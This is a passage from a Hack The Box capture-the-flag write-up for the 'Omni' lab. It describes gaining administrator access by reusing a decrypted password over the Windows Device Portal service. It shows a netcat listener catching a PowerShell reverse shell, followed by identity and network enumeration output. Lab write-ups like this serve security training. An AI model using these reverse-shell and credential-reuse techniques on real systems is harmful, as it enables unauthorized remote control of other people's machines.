Administrator


There isn’t much to privilege escalation to the administrator as I am already the SYSTEM. But here we go

I can take advantage of the WDP service running over HTTP just like how I made the lateral movement to the app user Authenticating as the administrator user with the decrypted password

Executing a Netcat reverse shell command

┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 1234    
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49707
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
ps c:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
ps c:\windows\system32> hostname
omni
ps c:\windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::a8
   ipv6 address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
   temporary ipv6 address. . . . . . : dead:beef::f443:5df:b248:953c
   link-local ipv6 address . . . . . : fe80::f178:17b1:199:4ce4%4
   ipv4 address. . . . . . . . . . . : 10.10.10.204
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
                                       10.10.10.2

Privilege Escalation to the administrator user Now that a valid PowerShell session has been established with the credential of the administrator user, I can continue the last decryption

i used [system.security.principal.windowsidentity]::GetCurrent().Name since whoami.exe is not available